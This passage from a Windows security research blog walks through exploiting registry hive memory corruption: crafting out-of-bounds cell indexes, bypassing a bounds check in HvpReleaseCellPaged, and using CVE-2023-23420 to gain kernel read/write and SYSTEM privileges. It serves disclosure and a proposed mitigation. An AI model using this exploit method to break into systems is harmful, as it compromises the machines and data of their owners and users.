The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory.All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic.The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness.I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes.
As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table:
The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below:
The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field.From an exploitation perspective, two facts are crucial here.First, the HvpGetCellPaged function does not perform any bounds checks on the input index.Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array.In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive.This behavior is shown in the screenshot below:
What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases.As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green).
This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers.This situation is illustrated in the diagram below:
In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result.An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build.Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors.
On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout:
0:kd>dt_HMAP_ENTRY
nt!_HMAP_ENTRY
+0x000BlockOffset:Uint8B
+0x008PermanentBinAddress:Uint8B
+0x010MemAlloc:Uint4B
And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields.Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options.
If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following:
The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences.However, it is important to remember that not every edge in this graph will be traversable in practice.This is because of two reasons: first, due the layout of the _HMAP_ENTRY structure (i.e. 0x18-byte alignment and the need for a 0x0 value being adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized.For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides some good foundation for our exploit, but it does require additional experimentation to get every technical detail right.
Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure.We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this.The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1).In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile.Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields:
In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193.The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18).
So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3.Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure.
0:kd>dt_HMAP_ENTRY0xffff82828fdcc8e0+3*0x18
nt!_HMAP_ENTRY
+0x000BlockOffset:0
+0x008PermanentBinAddress:0xffff8282`8fc1a000
+0x010MemAlloc:0
The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news.Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zero'ed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example.
We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning.It is time to gather all this information in one place; we can build the final cell index using a simple Python function:
And then pass the values we have established so far:
>>>MakeCellIndex(1,0x193,3,0)
0xb2603000
>>>
So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000.It is now time to verify in WinDbg whether this magic index actually works as intended.
Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size).If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value.This represents a very powerful capability in the hands of a local attacker.
Writing the exploit
At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.
Step 0: Choosing the vulnerability
Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.
CVE-2022-34707
The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707.This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit.The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it.This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times.In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes.
Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.
CVE-2023-23420
This brings us to the second vulnerability, CVE-2023-23420.This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell.It was caused by certain issues in the transactional key rename operation.These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations.
In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to.This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do.Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle.So let's get to work!
Step 1: Abusing the UAF to establish dynamically-controlled value cells
Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout:
At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create.Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty).Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability.Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent.
Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps:
Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.
Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.
Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".
Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).
Committing the entire transaction by calling the NtCommitRegistryTransaction syscall.
After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly:
We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome:
All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values.In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps:
Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key.At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.
Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.
Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor.This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations.This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey.This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.
Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData".This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us.
If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress.An example from my test system is shown in the screenshot below.The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation.This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity.
Step 2: Getting read/write access to the CMHIVE kernel object
Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents.Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool.If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise:
This is definitely not the result we expected, and something must have gone wrong.If we investigate the system crash in WinDbg, we will get the following information:
We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access.Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series.
To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:
There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it.We are already familiar with the first two, and they are both obvious, but what is the release about?Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was not only used for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls.
The presence or absence of the "release" function in consecutive Windows versions is shown below:
Windows NT 3.1 – 2000: ❌
Windows XP – 7: ✅
Windows 8 – 8.1: ❌
Windows 10 – 11: ✅
Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x:
As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRunDown field.This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object.An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered.
This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged.This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form:
The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers.Still, it interferes with our carefully crafted exploitation technique.Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead?
As it turns out, not necessarily.Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness.However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call.In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation.Let's take another look at the if statement that stands in our way:
The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure.On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage:
0:kd>dx(&((_HHIVE*)0)->Storage[0].Length)
(&((_HHIVE*)0)->Storage[0].Length):0x118
0:kd>dx(&((_HHIVE*)0)->Storage[1].Length)
(&((_HHIVE*)0)->Storage[1].Length):0x390
As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure.By adding one of the offsets above, we can obtain an index that points directly to the Length field.Let's test this in practice:
So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive.This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps:
Crafting a controlled registry value with a data index of 0xB260338C.
Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.
During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted.As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.
Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability.
To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place.
The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future.
For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before.This prevents the kernel from crashing due to the unexpectedly large hive length.Specifically, the flags are (as named in blog post #6):
HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.
HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path.
Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor:
It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory:
Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes.Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data.We are getting very close to our goal!
Step 3: Getting arbitrary read/write access to the entire kernel address space
At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be.
If not that, then what else?Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process.However, I had a specific goal in mind that I wanted to achieve from the start.I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit.This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically—based solely on how the registry works—contain the data from that address, available for both reading and writing.This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation—something that doesn't happen very often.🙂
The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism.In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk.Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr.
In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences:
_CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU).
_CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives.
For KernelData, we can use any self-referencing pointer in the first step of the cell walk.These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list.
The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan.Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???.The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object.This should be a 0x18 byte area that is generally unused and located after a self-referencing pointer.For demonstration purposes, I used offset 0xB70, which corresponds to the following fields:
_CMHIVE layout
_HMAP_ENTRY layout
+0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT
+0x000 BlockOffset : Uint8B
+0xb78 RootKcb : Ptr64 _CM_KEY_CONTROL_BLOCK
+0x008 PermanentBinAddress : Uint8B
+0xb80 Frozen : UChar
+0x010 MemAlloc : Uint4B
On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure.The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C.If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number.
As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer.To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F.Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29.If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index.We will use the MakeCellIndex helper function defined earlier for this purpose:
>>>MakeCellIndex(1,0x7F,0x29,0)
0x8fe29000
So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction.This is illustrated in the diagram below:
The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left.The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers.As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved.
We could end this section right here, but there is one more minor issue I'd like to mention.As you may recall, the HvpGetCellPaged function ends with the following statement:
Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration.
So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations:
The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.
The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything.
However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg:
And then let's browse to the same address using our FakeKey in Regedit:
The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC.
An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂
Step 4: Elevating process security token
With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality.The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter.This method is illustrated in the diagram below.
This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit looks as follows:
Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges:
As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation:
Final thoughts
Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken:
To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.
Exploit mitigations
The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism.Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying.Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical.
Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users.I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes.I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.
False File Immutability
So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption.This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory.This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are accessed.Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to.This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open.
As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind.He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over it.However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6.These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed.
However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114.The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive.This completely bypassed the sharing access right checks and their associated security guarantees.With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.
Conclusion
Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance.🙂 Through these write ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day.My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole.Thank you for joining me on this adventure, and see you next time!
In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it.In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation.I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research.One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right.On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject.And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasonsto share the information with the wider community.There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future.
